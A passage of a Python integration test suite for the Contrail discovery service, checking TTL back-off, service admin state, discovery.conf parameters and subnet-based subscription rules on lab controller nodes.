self.ds_obj.modify_discovery_conf_file_params(operation='change_ttl_short_and_hc_max_miss')
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
self.publish_service_with_admin_state(service, base_ip, port, 'down', no_of_services)
if not self.verify_service_status(service, base_ip, no_of_services, expected_status='down'):
result = result and False
# Verify instnaces == 0 will send all services
cuuid = uuid.uuid4()
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=0, client_id=str(cuuid))
resp = resp[service]
if len(resp) == 0 :
result = result and True
self.logger.info("Down services are not returned by the discovery server")
else:
result = result and False
self.logger.error("Discovery server returning down services for the client's subscription")
self.logger.info(
"Sending 30 subscription message to discovery for the down services \
and verify if any of them is returned..")
for i in range(30):
cuuid = uuid.uuid4()
resp = self.ds_obj.subscribe_service_from_discovery(self.inputs.cfgm_ip, service, 0, str(cuuid))
time.sleep(1)
resp = resp[service]
if resp:
self.logger.error("Down service is returned by the discovery server")
result = result and False
# change the admin state from down to up and verify if discovery started returning services
published_service_lst = []
for x in range(1, no_of_services + 1):
svc_ip = base_ip + str(x)
svc = 'svc' + str(x)
self.ds_obj.update_service(self.inputs.cfgm_ip, service, svc_ip, admin_state='up')
time.sleep(5)
if not self.verify_service_status(service, base_ip, no_of_services, expected_status='up'):
result = result and False
# Verify instnaces == 0 will send all services
cuuid = uuid.uuid4()
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=0, client_id=str(cuuid))
resp = resp[service]
if len(resp) < no_of_services:
result = result and False
self.logger.error("Not all services returned")
self.logger.info(
"Sending 30 subscription message to discovery..")
subs_threads = []
for i in range(30):
cuuid = uuid.uuid4()
t = threading.Thread(target=self.ds_obj.subscribe_service_from_discovery, args=(
self.inputs.cfgm_ip, service, 2, str(cuuid)))
subs_threads.append(t)
for th in subs_threads:
th.start()
time.sleep(3)
for th in subs_threads:
th.join()
except Exception as e:
self.logger.exception("Got exception %s"%(e))
raise
finally:
self.ds_obj.modify_discovery_conf_file_params(operation='change_ttl_short_and_hc_max_miss',\
ttl_short=1, hc_max_miss=3)
self.logger.info("%s"%(msg))
resp = self.ds_obj.cleanup_service_from_discovery(
self.inputs.cfgm_ip)
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
resp = None
assert result
return True
# End test test_send_admin_state_in_publish
@preposttest_wrapper
def test_publish(self):
''' Validate short ttl
'''
self.logger.info(
"********TEST WILL FAIL IF RAN MORE THAN ONCE WITHOUT CLEARING THE ZOOKEEPER DATABASE*********")
service = 'dummy_service23'
port = 65093
result = True
try:
# Changing the hc_max_miss=3000 and verifying that the services are
# down after 25 mins
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss/c\hc_max_miss = 3000\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;sed -i \'/ttl_short/c\\ttl_short = 2\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;cat contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
out_put = self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.logger.info("%s" % (out_put))
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
time.sleep(10)
base_ip = '192.168.1.'
expected_ttl = 2
cuuid = uuid.uuid4()
while(expected_ttl <= 32):
resp = None
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=1, client_id=str(cuuid))
ttl = resp['ttl']
self.logger.info("ttl : %s" % (ttl))
if (ttl <= expected_ttl):
result = result and True
else:
result = result and False
self.logger.info("Waiting for %s sec..." % (expected_ttl))
time.sleep(expected_ttl)
expected_ttl = expected_ttl * 2
self.logger.info("Verifying that the ttl sablizes at 32 sec..")
resp = None
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=1, client_id=str(cuuid))
ttl = resp['ttl']
self.logger.info("ttl : %s" % (ttl))
if (ttl <= 32):
result = result and True
else:
result = result and False
# Bringing up services
self.logger.info("Bringing up services...")
for x in range(1, 4):
svc_ip = base_ip + str(x)
svc = 'svc' + str(x)
self.logger.info("Publishing service with ip %s and port %s" %
(svc_ip, port))
svc = self.ds_obj.publish_service_to_discovery(
self.inputs.cfgm_ip, service=service, ip=svc_ip, port=port)
time.sleep(5)
self.logger.info("Verifying that the nornal ttl sent..")
resp = None
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=1, client_id=str(cuuid))
ttl = resp['ttl']
self.logger.info("ttl : %s" % (ttl))
if (ttl in range(300, 1800)):
result = result and True
else:
result = result and False
# Verify instnaces == 0 will send all services
cuuid = uuid.uuid4()
resp = self.ds_obj.subscribe_service_from_discovery(
self.inputs.cfgm_ip, service=service, instances=0, client_id=str(cuuid))
resp = resp[service]
if len(resp) < 3:
result = result and False
self.logger.warn("Not all services returned")
expected_ip_list = ['192.168.1.1', '192.168.1.2', '192.168.1.3']
result1 = True
for elem in resp:
self.logger.info("%s" % (elem))
if (elem['ip-address'] in expected_ip_list and elem['port'] == port):
result1 = result1 and True
expected_ip_list.remove(elem['ip-address'])
else:
self.logger.info('inside else')
result1 = result1 and False
if result1:
self.logger.info(
"All services correctly received by subscriber")
result = result and result1
else:
self.logger.warn("All services not received by subscriber")
result = result and result1
self.logger.warn("Missing service as %s" % (expected_ip_list))
except Exception as e:
print e
finally:
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss/c\hc_max_miss = 3\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;sed -i \'/ttl_short/c\\ttl_short = 1\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
cmd = 'cd /etc/contrail;cat contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
out_put = self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.logger.info("%s" % (out_put))
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
time.sleep(40)
resp = None
resp = self.ds_obj.cleanup_service_from_discovery(
self.inputs.cfgm_ip)
assert result
return True
@preposttest_wrapper
def test_change_parameters_in_contrail_discovery_conf(self):
''' Validate parameters in discovery.conf
-ttl_min
-ttl_max
-hc_max_miss
-policy
'''
# Changing the hc_max_miss=5 and verifying that the services are down
# after 25 sec
try:
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss.*=.*/c\hc_max_miss = 10\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
result = True
svc_lst = []
svc_lst = self.ds_obj.get_all_control_services(self.inputs.cfgm_ip)
for elem in svc_lst:
if (self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem) == 'up'):
self.logger.info("Service %s is up" % (elem,))
result = result and True
else:
self.logger.warn("Service %s is down" % (elem,))
result = result and False
svc_lst.remove(elem)
# Stopping the control node service
for elem in svc_lst:
ip = elem[0]
self.logger.info("Stopping service %s.." % (elem,))
self.inputs.stop_service('contrail-control', [ip])
time.sleep(15)
for elem in svc_lst:
ip = elem[0]
if (self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem) == 'up'):
self.logger.info("Service %s is still up" % (elem,))
result = result and True
else:
self.logger.warn("Service %s is down before 25 sec" %
(elem,))
result = result and False
time.sleep(45)
for elem in svc_lst:
ip = elem[0]
if (self.ds_obj.get_service_status(self.inputs.cfgm_ip, service_tuple=elem) == 'up'):
self.logger.warn("Service %s is still up after 30 secs" %
(elem,))
result = result and False
else:
self.logger.info("Service %s is down after 30 sec" %
(elem,))
result = result and True
# Starting the control node service
for elem in svc_lst:
ip = elem[0]
self.logger.info("Starting service %s.." % (elem,))
self.inputs.start_service('contrail-control', [ip])
time.sleep(6)
except Exception as e:
print e
finally:
# Changing the hc_max_miss=3
cmd = 'cd /etc/contrail;sed -i \'/hc_max_miss.*=.*/c\hc_max_miss = 3\' contrail-discovery.conf'
for ip in self.inputs.cfgm_ips:
self.inputs.run_cmd_on_server(
ip, cmd, username='root', password='c0ntrail123')
self.inputs.restart_service('contrail-discovery', [ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
time.sleep(10)
assert result
# Change policy and verify discovery functionality: policy =
# [load-balance | round-robin | fixed]
self.logger.info("Changing the discovery policy to round-robin")
cmd = 'cd /etc/contrail;echo \'policy = round-robin \'>> contrail-discovery.conf'
self.inputs.run_cmd_on_server(
self.inputs.cfgm_ip, cmd, username='root', password='c0ntrail123')
self.inputs.restart_service(
'contrail-discovery', [self.inputs.cfgm_ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
assert self.ds_obj.verify_bgp_connection()
self.logger.info("Changing the discovery policy to fixed")
cmd = 'cd /etc/contrail;sed -i \'/policy = round-robin/c\policy = fixed\' contrail-discovery.conf'
self.inputs.run_cmd_on_server(
self.inputs.cfgm_ip, cmd, username='root', password='c0ntrail123')
self.inputs.restart_service(
'contrail-discovery', [self.inputs.cfgm_ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
assert self.ds_obj.verify_bgp_connection()
self.logger.info("Reverting back policy to default")
cmd = 'cd /etc/contrail;sed -i \'/policy = fixed/c\ \' contrail-discovery.conf'
self.inputs.run_cmd_on_server(
self.inputs.cfgm_ip, cmd, username='root', password='c0ntrail123')
self.inputs.restart_service(
'contrail-discovery', [self.inputs.cfgm_ip])
assert self.analytics_obj.verify_cfgm_uve_module_state(
self.inputs.collector_ips[0], self.inputs.cfgm_names[0], 'contrail-discovery')
assert self.ds_obj.verify_bgp_connection()
return True
@preposttest_wrapper
def test_rule_for_vrouter_with_xmpp_server(self):
''' Validate that applied rules takes effect correctly for
contrail-vrouter-agent and its subscription to XMPP Server.
Steps:
1. Create rules for all contrail-vrouter-agent of 1 network
to subscribe to XMPP Servers of same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of XMPP servers running in different subnets
Also, setup requirement of this test case is to have at
least 2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,\
"change_min_max_ttl")
if len(self.inputs.bgp_control_ips) > 0:
self.logger.info("Creating rules corresponding to control node *xmpp-server*")
self.logger.info(" Subscribers are *vrouter agent* running in same subnets")
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(bgp_control_ip,'xmpp-server',\
bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0', \
self.inputs.compute_control_ips[i], 'xmpp-server')
if verification == False:
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule( bgp_control_ip,\
'xmpp-server', bgp_control_ip,'contrail-vrouter-agent:0')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_vrouter_with_dns_server(self):
''' Validate that applied rules takes effect correctly for
contrail-vrouter-agent and its subscription to DNS Server.
Steps:
1. Create rules for all contrail-vrouter-agent of 1 network to
subscribe to DNS Servers of same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of DNS servers running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("dns-server", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.bgp_control_ips) > 0:
self.logger.info("Creating rules corresponding to control node *DNS-Server*")
self.logger.info(" Subscribers are *vrouter agent* running in same subnets")
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule( bgp_control_ip,\
'dns-server',bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0', \
self.inputs.compute_control_ips[i], 'dns-server')
if verification == False:
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule( bgp_control_ip,\
'dns-server', bgp_control_ip,'contrail-vrouter-agent:0')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_control_with_ifmap_server(self):
''' Validate that applied rules takes effect correctly for
"contrail-control" and its subscription to IfmapServer.
Steps:
1. Create rules for all contrail-control of 1 network to subscribe
to Ifmap Servers of same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having a contrail-control
connected to 2 instances of Ifmap servers running in different subnets
Also, setup requirement of this test case is to have at least 2
publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("IfmapServer", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-control')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.cfgm_control_ips) > 0:
self.logger.info("Creating rules corresponding to config node *IfmapServer*")
self.logger.info(" Subscribers are *contrail-control* running in same subnets")
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule( cfgm_control_ip,\
'IfmapServer', cfgm_control_ip, 'contrail-control')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.bgp_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-control', self.inputs.bgp_control_ips[i],\
'IfmapServer')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule( cfgm_control_ip,\
'IfmapServer', cfgm_control_ip, 'contrail-control')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_webui_with_op_server(self):
''' Validate that applied rules takes effect correctly for
"contrailWebUI" and its subscription to Op Server.
Steps:
1. Create rules for all contrailWebUI of 1 network to
subscribe to Op Servers of same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having ContrailWebUI
connected to OP server running in different subnet.
'''
self.ds_obj.skip_discovery_test("OpServer", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'supervisor-webui')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.collector_control_ips) > 0:
self.logger.info("Creating rules corresponding to collector node *OpServer*")
self.logger.info(" Subscribers are *contrailWebUI* running in same subnets")
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(collector_control_ip,\
'OpServer', collector_control_ip,'contrailWebUI')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.webui_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrailWebUI', self.inputs.webui_control_ips[i], 'OpServer')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule(collector_control_ip,\
'OpServer', collector_control_ip,'contrailWebUI')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_webui_with_api_server(self):
''' Validate that applied rules takes effect correctly for
"contrailWebUI" and its subscription to API Server.
Steps:
1. Create rules for all contrailWebUI of 1 network to subscribe
to Op Servers of same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having ContrailWebUI
connected to API server running in different subnet.
'''
self.ds_obj.skip_discovery_test("ApiServer", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'supervisor-webui')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.cfgm_control_ips) > 0:
self.logger.info("Creating rules corresponding to config node *ApiServer*")
self.logger.info(" Subscribers are *contrailWebUI* running in same subnets")
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(cfgm_control_ip,\
'ApiServer', cfgm_control_ip, 'contrailWebUI')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.webui_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrailWebUI', self.inputs.webui_control_ips[i], 'ApiServer')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule(cfgm_control_ip,\
'ApiServer', cfgm_control_ip, 'contrailWebUI')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_vrouter_with_collector(self):
''' Validate that applied rules takes effect correctly for
"contrail-vrouter-agent" and its subscription to Collector.
Steps:
1. Create rules for all contrail-vrouter-agent of 1 network
to subscribe to Collector of same network.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of Collectors running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("Collector", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.collector_control_ips) > 0:
self.logger.info("Creating rules corresponding to collector node *Collector*")
self.logger.info(" Subscribers are *vrouter-agent* running in same subnets")
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(collector_control_ip,\
'Collector', collector_control_ip,'contrail-vrouter-agent:0')
if rule_status == False:
result = False
self.logger.info("#### Waiting for 60 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0', \
self.inputs.compute_control_ips[i], 'Collector')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule(collector_control_ip,\
'Collector', collector_control_ip,'contrail-vrouter-agent:0')
if rule_status == False:
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_for_collector_with_multi_clients(self):
''' Validate that applied rules takes effect correctly for multiple
clients mentioned sequentially in a single rule for Collector as
a Server/Publisher.
Steps:
1. Create s single rule for multiple types of clients to subscribe
to single Publisher. Mention all subscriber in that rule.
2. Verify if rule is working as expected or not. Verify that all
clients subscribe to single publisher only.
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of Collectors running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("Collector", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl(30, 30, 'contrail-vrouter-agent',\
'contrail-topology', 'contrail-control', 'contrail-api')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.collector_control_ips) > 0:
self.logger.info("Creating rules corresponding to collector node *Collector*")
self.logger.info("Subscribers are mulitple services running in same subnets")
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
self.ds_obj.discovery_rule_config( "add_rule",
'default-discovery-service-assignment', collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0',\
collector_control_ip, 'contrail-topology', collector_control_ip,\
'contrail-control', collector_control_ip, 'contrail-api')
result1 = self.ds_obj.discovery_rule_config( "find_rule",\
'default-discovery-service-assignment', collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0',\
collector_control_ip, 'contrail-topology', collector_control_ip,\
'contrail-control', collector_control_ip, 'contrail-api')
if result1 == False:
self.logger.error("# While searching, rule not found. Configuration failed #")
result = False
self.ds_obj.read_rule('default-discovery-service-assignment')
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep(30)
self.logger.debug("#### Verifying clients subscribed to publishers ###")
try:
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher(\
ds_ip, 'contrail-vrouter-agent:0', \
self.inputs.compute_control_ips[i], 'Collector')
if verification == False:
self.logger.error("# Rule not behaving as expected #")
result = False
for i in range(0,len(self.inputs.bgp_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-control', \
self.inputs.bgp_control_ips[i], 'Collector')
if verification == False:
self.logger.error("# Rule not behaving as expected #")
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-topology',\
self.inputs.collector_control_ips[i], 'Collector')
if verification == False:
self.logger.error("# Rule not behaving as expected #")
result = False
for i in range(0,len(self.inputs.cfgm_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-api', \
self.inputs.cfgm_control_ips[i], 'Collector')
if verification == False:
self.logger.error("# Rule not behaving as expected #")
result = False
except Exception as e:
self.logger.error(e)
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
self.ds_obj.discovery_rule_config( 'del_rule',\
'default-discovery-service-assignment', collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0',\
collector_control_ip, 'contrail-topology', collector_control_ip,\
'contrail-control', collector_control_ip, 'contrail-api')
result1 = self.ds_obj.discovery_rule_config( "find_rule",\
'default-discovery-service-assignment', collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0',\
collector_control_ip, 'contrail-topology', collector_control_ip,\
'contrail-control', collector_control_ip, 'contrail-api')
if result1 == True:
self.logger.error("# While searching for the deleted rule, it was found. Deletion failed #")
result = False
self.ds_obj.read_rule("default-discovery-service-assignment")
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_subscribe_request_with_diff_instances_rules(self):
''' Validate that different instances of Publishers are assigned to
client based on the instance value requested by clients.
Also validate that if rules are present, requested instances are
restricted based on rules.
Steps:
1. Use a non contrail synthetic subscribe request to test this.
2. Use some instance value in subscribe request and verify that
requested instances of publisher are assigned.
3. Create a rule with same requested Publisher and subscribe request.
4. Verify that even if instances asked are more but as rule is present,
the request will be restricted to get only 1 instance of that publisher.
5. Delete the rule.
6. Again test that same subscribe request will again get all instances requested.
Precondition: Assumption is that setup is having a subscriber
connected to 3 instances of XMPP, all running in different subnets
Also, setup requirement of this test case is to have at least 3 publishers
All publishers should be in different network.
'''
self.ds_obj.skip_discovery_test("IfmapServer", min_instances=2, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
self.logger.debug("#### Changing min and max TTL values for testing purpose ##")
assert self.ds_obj.modify_discovery_conf_file_params('change_min_max_ttl',\
ttl_min=30, ttl_max=30)
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
try:
self.logger.info("#### Sending a dummy client request with instance value 3 ##")
self.logger.info("### Client will subscribe to IfmapServer #####")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer", \
instances="3", min_instances="0",\
client_id=self.inputs.compute_names[0]+":TestClient",\
remote_addr= self.inputs.compute_control_ips[0], \
client_type= "TestClient")
sleep(2)
self.logger.debug("# Verifying the number of instances of publishers granted to the client #")
ifmap_server_count = len(self.inputs.cfgm_control_ips)
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"TestClient"), service="IfmapServer")
instances_allocated = len(client_subscribed_service_id)
self.logger.debug("# The instances of publishers allocated to TestClient are %d #" \
% instances_allocated)
self.logger.debug("# The total number of publishers running of such types are %d #" \
% ifmap_server_count)
if ifmap_server_count == instances_allocated or (ifmap_server_count > 3 and instances_allocated == 3):
self.logger.info("# Instance field working as expected #")
else:
self.logger.error("# Instance field not working as expected. #")
result = False
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("# Now creating a rule to verify that even if multiple\
instances are requested but if a rule is present, it will limit the instances #")
self.ds_obj.add_and_verify_rule(self.inputs.cfgm_control_ips[0], \
'IfmapServer', self.inputs.compute_control_ips[0], 'TestClient')
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep(30)
try:
